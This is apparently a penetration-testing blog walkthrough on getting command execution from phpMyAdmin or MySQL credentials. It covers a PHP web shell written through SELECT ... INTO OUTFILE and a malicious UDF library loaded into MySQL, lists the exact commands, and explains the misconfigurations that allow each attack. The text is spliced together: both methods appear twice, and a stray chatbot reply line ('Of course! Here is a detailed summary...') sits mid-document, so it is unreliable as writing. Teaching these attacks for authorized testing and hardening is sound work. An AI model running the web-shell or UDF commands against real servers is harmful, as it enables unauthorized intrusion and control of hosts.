Premise
In this post walkthrough, I demonstrated how to compromise and get a reverse connection starting from PhpMyAdmin or MySQL credentials in hand. We also demonstrated how these kinds of weaknesses and misconfigurations could happen and how to mitigate them.
Skills Learned
- PHPmyAdmin
- MYSQL
- OSCP 2020
- Database Penetration Testing
Method 1: The PHP Shell via INTO OUTFILE
My first approach involves using a powerful feature in MySQL called SELECT ... INTO OUTFILE. This allows me to write the output of a SELECT statement to a file on the server. My goal is to create a PHP web shell in a directory that’s accessible from a web browser.
I start by logging into phpMyAdmin and heading over to the SQL query editor. From there, I execute a carefully crafted SQL query that contains a snippet of PHP code. This code is designed to execute system commands that are passed to it through a URL. I then use the INTO OUTFILE clause to save this PHP code as a file in the web server’s root directory.
Once the file is created, I can simply access it from my browser. By appending ?cmd= followed by a command to the URL, I can execute commands on the server. I’ll show you how I can run commands like ifconfig and uname -a to get information about the server.
This attack is only possible because of a couple of common misconfigurations:
- Insecure Directory Permissions: The web server’s root directory has write permissions for the user running phpMyAdmin. This should never be the case. The correct permissions should be
755, which only allows the owner to write to the directory. secure_file_privSetting: Thesecure_file_privvariable in the MySQL configuration is not set, or it’s set to a non-restrictive value. This variable should be configured to only allow writing to a specific, non-web-accessible directory.
Method 2: The User-Defined Function (UDF) Exploit
My second method is a bit more advanced and involves using a User-Defined Function (UDF) to execute system commands. A UDF is a custom function that can be added to MySQL to extend its functionality.
First, I need to get a malicious UDF binary file onto the victim machine. I then use the MySQL command prompt to create a table and load the UDF binary into it. Next, I dump the contents of that table into a new shared library file in a directory that MySQL can access.
Finally, I create a new function in MySQL that calls the system command from the newly created shared library. This method is a bit more complex and can be tricky to pull off, as it’s often blocked by security features like AppArmor on Ubuntu systems.
Of course! Here is a detailed summary of the video, presented in a conversational tone and from a first-person perspective, just as you requested.
Hacking Databases: From SQL to Shell
In this video, I’m diving into the world of database exploitation, specifically focusing on how to leverage phpMyAdmin and MySQL to gain a remote shell on a target machine. I’ll be demonstrating two primary methods to achieve this.
Method 1: The PHP Shell via INTO OUTFILE
My first approach involves using a powerful feature in MySQL called SELECT ... INTO OUTFILE. This allows me to write the output of a SELECT statement to a file on the server. My goal is to create a PHP web shell in a directory that’s accessible from a web browser.
I start by logging into phpMyAdmin and heading over to the SQL query editor. From there, I execute a carefully crafted SQL query that contains a snippet of PHP code. This code is designed to execute system commands that are passed to it through a URL. I then use the INTO OUTFILE clause to save this PHP code as a file in the web server’s root directory.
Once the file is created, I can simply access it from my browser. By appending ?cmd= followed by a command to the URL, I can execute commands on the server. I’ll show you how I can run commands like ifconfig and uname -a to get information about the server.
This attack is only possible because of a couple of common misconfigurations:
- Insecure Directory Permissions: The web server’s root directory has write permissions for the user running phpMyAdmin. This should never be the case. The correct permissions should be
755, which only allows the owner to write to the directory. secure_file_privSetting: Thesecure_file_privvariable in the MySQL configuration is not set, or it’s set to a non-restrictive value. This variable should be configured to only allow writing to a specific, non-web-accessible directory.
Method 2: The User-Defined Function (UDF) Exploit
My second method is a bit more advanced and involves using a User-Defined Function (UDF) to execute system commands. A UDF is a custom function that can be added to MySQL to extend its functionality.
First, I need to get a malicious UDF binary file onto the victim machine. I then use the MySQL command prompt to create a table and load the UDF binary into it. Next, I dump the contents of that table into a new shared library file in a directory that MySQL can access.
Finally, I create a new function in MySQL that calls the system command from the newly created shared library. This method is a bit more complex and can be tricky to pull off, as it’s often blocked by security features like AppArmor on Ubuntu systems.
Technical Commands Used
Throughout this demonstration, I use a variety of commands to achieve my goals. Here are some of the key commands I use:
- Creating a PHP Web Shell:SQL
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell3.php'; - Checking Network and System Information:
ifconfig uname -a - Changing Directory Permissions:
chmod 755 html - Connecting to MySQL:
mysql -h [IP address] -u [username] -p - Creating a Table for the UDF:SQL
CREATE TABLE udf2 (line BLOB); - Loading the UDF into the Table:SQL
INSERT INTO udf2 VALUES (LOAD_FILE('/tmp/mysql_udf.so')); - Dumping the UDF to a Shared Library:SQL
SELECT * FROM udf2 INTO DUMPFILE '/var/log/mysql/lib_mysql_udf_sys.so'; - Creating the UDF in MySQL:SQL
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysql_udf_sys.so';
Video Walkthrough
You can also watch my video about Database Pentesting using UDFs for your reference.
